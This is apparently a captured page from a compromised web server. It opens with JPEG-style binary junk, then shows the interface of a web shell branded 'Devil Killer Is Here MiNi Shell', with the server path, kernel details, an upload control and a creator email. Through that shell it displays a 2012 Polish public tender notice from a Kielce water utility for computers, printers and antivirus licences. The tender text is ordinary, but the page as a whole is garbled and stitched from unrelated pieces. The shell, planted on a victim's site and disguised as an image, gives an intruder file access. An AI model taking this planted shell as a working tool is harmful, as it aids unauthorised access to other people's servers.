JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120320/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120320/86356-N-2012.html

<p class="kh_header"><b>Kielce: Dostawa sprzętu komputerowego i oprogramowania.</b><br>
<b>Numer ogłoszenia: 86356 - 2012; data zamieszczenia: 20.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wodociągi Kieleckie Sp. z o.o. , ul. Krakowska 64, 25-701 Kielce, woj. świętokrzyskie, tel. 041 3653100, faks 041 3455220.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wod-kiel.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego i oprogramowania..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie przedmiotu oraz wielkości lub zakresu zamówienia
Przedmiotem zamówienia jest dostawa sprzętu komputerowego i oprogramowania.

CZĘŚĆ   I:
1. Zestaw komputerowy - 3 szt.

2. Zestaw komputerowy - 3 szt.

3. Zestaw komputerowy - 3 szt.
4. MS Office 2010 PL MOLP - 13 szt.
5. Zasilacz awaryjny UPS o mocy czynnej min. 450W - 9 szt.
6. Program Norma Pro - aktualizacja - 2 szt.
7. Adobe Photoshop EXT CS5 PL Win - 1 szt.
8. Drukarka atramentowa A3 - 3 szt. 

9. Drukarka atramentowa A4 - 1 szt. 

10.Drukarka laserowa monochromatyczna A4 - 2 szt.

11. Drukarka termiczna ZEBRA RW 420 - 1 szt.	

12. Projektor multimedialny - 1 szt.
13. Kabel zasilający łączący komputer z UPS - 30 szt.
14. Notebook - 3 szt.

15. Notebook - 1 szt.

16. Napęd optyczny DVD+/-RW, panel w kolorze czarnym - 10 szt.

CZĘŚĆ  II:

1. Przedłużenie subskrypcji do programu antywirusowego McAfee VirusScan Enterprise  - dla 162 stanowisk

2. Dodatkowe licencje do w/w programu antywirusowego wraz z konsolidacją - 20 szt.
UWAGI:
1.Szczegółowy opis przedmiotu zamówienia został zawarty w załączniku nr 5 do SIWZ.

2.Przedmiot zamówienia określono poprzez wskazanie obiektywnych cech jakościowych oraz  standardów, dla których określenia dopuszcza się wskazanie przykładowych nazw (znaków towarowych).

3.Podane przez Zamawiającego ewentualne nazwy (znaki towarowe) zamawianego asortymentu mają charakter przykładowy, a ich wskazanie ma na celu określenie oczekiwanego standardu zamawianego asortymentu oraz standaryzację posiadanego sprzętu i oprogramowania, przy czym Zamawiający dopuszcza składanie ofert równoważnych.

4.Warunki gwarancji:
4.1. Dostarczony produkt musi posiadać poprawnie wypełnioną kartę gwarancyjną jednoznacznie identyfikującą urządzenie.
4.2.  W okresie objętym gwarancją Wykonawca zobowiązuje się do nieodpłatnego usuwania usterek uszkodzonego sprzętu w siedzibie Zamawiającego lub nieodpłatnego odbierania uszkodzonego sprzętu od Zamawiającego oraz dostawy sprzętu wolnego od wad do siedziby Zamawiającego.
4.3. Z uwagi na ochronę danych osobowych komputery przekazywane do naprawy będą pozbawione dysku twardego. Wykonawca wymontuje go przy Zamawiającym komisyjnie.
4.4. W sytuacji, gdy ten sam element komputera lub urządzenie będzie naprawiany 3 razy, Zamawiający ma prawo do wymiany tegoż elementu lub urządzenia na nowy taki sam lub odpowiedni.
4.5. Długość okresu gwarancyjnego:
a)gwarancja na zestawy komputerowe wymienione w Części I, poz. 1, 2, 3 - 36 miesięcy na miejscu u Zamawiającego, zgodnie z załącznikiem nr 5, Część I, pozycja 1,
b)gwarancja na komputery przenośne wymienione w Części I, poz. 14 i 15 - 36 miesięcy na miejscu u Zamawiającego,
c)gwarancja na drukarkę termiczną - 12 miesięcy, na głowicę - 6 miesięcy,
d)na pozostały sprzęt gwarancja producenta.
  
5.Zamawiający dopuszcza składanie ofert częściowych.

6.Zamawiający nie dopuszcza składania ofert wariantowych.

7.Na oferowane produkty w Części I Wykonawca wystawi trzy faktury:
 - pierwsza  faktura na następujące pozycje:
    - pozycja nr 3
    - 3 sztuki z pozycji nr 4
    - 3 sztuki z pozycji nr 5
    - pozycja nr 6
    - 1 sztuka z pozycji nr 8
- druga faktura:  
    - atramenty do 1 szt. drukarki z pozycji nr 8
- trzecia faktura:
    - pozostałe pozycje..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.23.21.50-0, 30.21.31.00-6, 30.23.13.00-0, 30.23.21.10-8, 30.23.21.00-5, 38.65.21.20-7, 48.31.00.00-4, 42.96.20.00-7, 48.41.10.00-2, 31.68.25.30-4, 48.32.20.00-1, 31.22.44.00-6, 48.76.00.00-3, 48.76.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości: 
Pakiet I - 1 000,00 zł
Pakiet II - 100,00 zł
w terminie do dnia 29 marca 2012 r. do godz. 845.
	
2. Wadium może być wnoszone: w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. 2007 Nr 42 poz. 275 z późniejszymi zmianami). 

3. Wadium wnoszone w formie pieniężnej należy wpłacać przelewem na konto Spółki z o.o. Wodociągi Kieleckie - nr 79 1030 1162 0000 0000 0508 0201.	

4. Oferta nie zabezpieczona wymaganą kwotą wadium, zostanie odrzucona  bez rozpatrzenia.

5. Wadium, wnosi się przed upływem terminu składania ofert; w terminie składania ofert, kwota wadium musi znajdować się na koncie Zamawiającego.

6. W przypadku wniesienia wadium w innej formie niż pieniężnej, oryginał dokumentu gwarancyjnego (w oddzielnej kopercie z zaznaczeniem postępowania, którego dotyczy)  musi być złożony w Biurze Obsługi Klienta  Spółki, przed upływem terminu składania ofert.

7. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.

8. Zamawiający zwraca wadium Wykonawcy, którego oferta została wybrana jako najkorzystniejsza niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego i wniesieniu zabezpieczenia należytego wykonania umowy.

9. Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 

10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
określonych w ofercie,
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn
leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Oświadczenie Wykonawcy, że dostawa spełnia wymagania SIWZ; załącznik nr 6
2.	Oświadczenie Wykonawcy wraz z wypisanymi parametrami technicznymi, eksploatacyjnymi i osiągami oferowanego sprzętu potwierdzającymi  równoważność oferowanych produktów opisanych w SIWZ, w przypadku oferowania produktów  równoważnych.

3.	Pełnomocnictwo do podpisania oferty i załączników do niej oraz umowy  w przypadku jego udzielenia.

4.	 Oświadczenie o solidarnej odpowiedzialności za należyte wykonanie zobowiązania (w przypadku  podmiotów występujących wspólnie).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku ustawowej zmiany stawki podatku VAT od towarów i usług, strony dopuszczają zmianę wynagrodzenia o kwotę wynikającą ze zmiany podatku VAT naliczonego od wartości netto części przedmiotu umowy niezrealizowanej przez Wykonawcę z przyczyn przez niego niezawinionych w dacie zmiany stawki podatku</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wod-kiel.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wodociągi Kieleckie Sp. z o.o. 
25-701 Kielce ul. Krakowska 64 , Biuro Obsługi Klienta..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.03.2012 godzina 08:45, miejsce: Wodociągi Kieleckie Sp. z o.o. 25-701 Kielce ul. Krakowska 64 , Biuro Obsługi Klienta..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa sprzętu komputerowego i oprogramowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zestaw komputerowy - 3 szt.

2. Zestaw komputerowy - 3 szt.

3. Zestaw komputerowy - 3 szt.
4. MS Office 2010 PL MOLP - 13 szt.
5. Zasilacz awaryjny UPS o mocy czynnej min. 450W - 9 szt.
6. Program Norma Pro - aktualizacja - 2 szt.
7. Adobe Photoshop EXT CS5 PL Win - 1 szt.
8. Drukarka atramentowa A3 - 3 szt. 

9. Drukarka atramentowa A4 - 1 szt. 

10.Drukarka laserowa monochromatyczna A4 - 2 szt.

11. Drukarka termiczna ZEBRA RW 420 - 1 szt.	

12. Projektor multimedialny - 1 szt.
13. Kabel zasilający łączący komputer z UPS - 30 szt.
14. Notebook - 3 szt.

15. Notebook - 1 szt.

16. Napęd optyczny DVD+/-RW, panel w kolorze czarnym - 10 szt.
UWAGI:
1.    Szczegółowy opis przedmiotu zamówienia został zawarty w załączniku nr 5 do SIWZ.

2.	Przedmiot zamówienia określono poprzez wskazanie obiektywnych cech jakościowych oraz  standardów, dla których określenia dopuszcza się wskazanie przykładowych nazw (znaków towarowych).

3.	Podane przez Zamawiającego ewentualne nazwy (znaki towarowe) zamawianego asortymentu mają charakter przykładowy, a ich wskazanie ma na celu określenie oczekiwanego standardu zamawianego asortymentu oraz standaryzację posiadanego sprzętu i oprogramowania, przy czym Zamawiający dopuszcza składanie ofert równoważnych.

4.	Warunki gwarancji:
4.1. Dostarczony produkt musi posiadać poprawnie wypełnioną kartę gwarancyjną jednoznacznie identyfikującą urządzenie.
4.2.  W okresie objętym gwarancją Wykonawca zobowiązuje się do nieodpłatnego usuwania usterek uszkodzonego sprzętu w siedzibie Zamawiającego lub nieodpłatnego odbierania uszkodzonego sprzętu od Zamawiającego oraz dostawy sprzętu wolnego od wad do siedziby Zamawiającego.
4.3. Z uwagi na ochronę danych osobowych komputery przekazywane do naprawy będą pozbawione dysku twardego. Wykonawca wymontuje go przy Zamawiającym komisyjnie.
4.4. W sytuacji, gdy ten sam element komputera lub urządzenie będzie naprawiany 3 razy, Zamawiający ma prawo do wymiany tegoż elementu lub urządzenia na nowy taki sam lub odpowiedni.
4.5. Długość okresu gwarancyjnego:
a)	gwarancja na zestawy komputerowe wymienione w Części I, poz. 1, 2, 3 - 36 miesięcy na miejscu u Zamawiającego, zgodnie z załącznikiem nr 5, Część I, pozycja 1,
b)	gwarancja na komputery przenośne wymienione w Części I, poz. 14 i 15 - 36 miesięcy na miejscu u Zamawiającego,
c)	gwarancja na drukarkę termiczną - 12 miesięcy, na głowicę - 6 miesięcy,
d)	na pozostały sprzęt gwarancja producenta.
  
5.	Zamawiający dopuszcza składanie ofert częściowych.

6.	Zamawiający nie dopuszcza składania ofert wariantowych.

7.	Na oferowane produkty w Części I Wykonawca wystawi trzy faktury:
 - pierwsza  faktura na następujące pozycje:
    - pozycja nr 3
    - 3 sztuki z pozycji nr 4
    - 3 sztuki z pozycji nr 5
    - pozycja nr 6
    - 1 sztuka z pozycji nr 8
- druga faktura:  
    - atramenty do 1 szt. drukarki z pozycji nr 8
- trzecia faktura:
    - pozostałe pozycje..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.23.21.50-0, 30.21.31.00-6, 30.23.13.00-0, 30.23.21.10-8, 30.23.21.00-5, 38.65.21.20-7, 48.31.00.00-4, 42.96.20.00-7, 48.41.10.00-2, 31.68.25.30-4, 48.32.20.00-1, 31.22.44.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa oprogramowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedłużenie subskrypcji do programu antywirusowego McAfee VirusScan Enterprise  - dla 162 stanowisk

2. Dodatkowe licencje do w/w programu antywirusowego wraz z konsolidacją - 20 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 48.76.00.00-3, 48.76.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com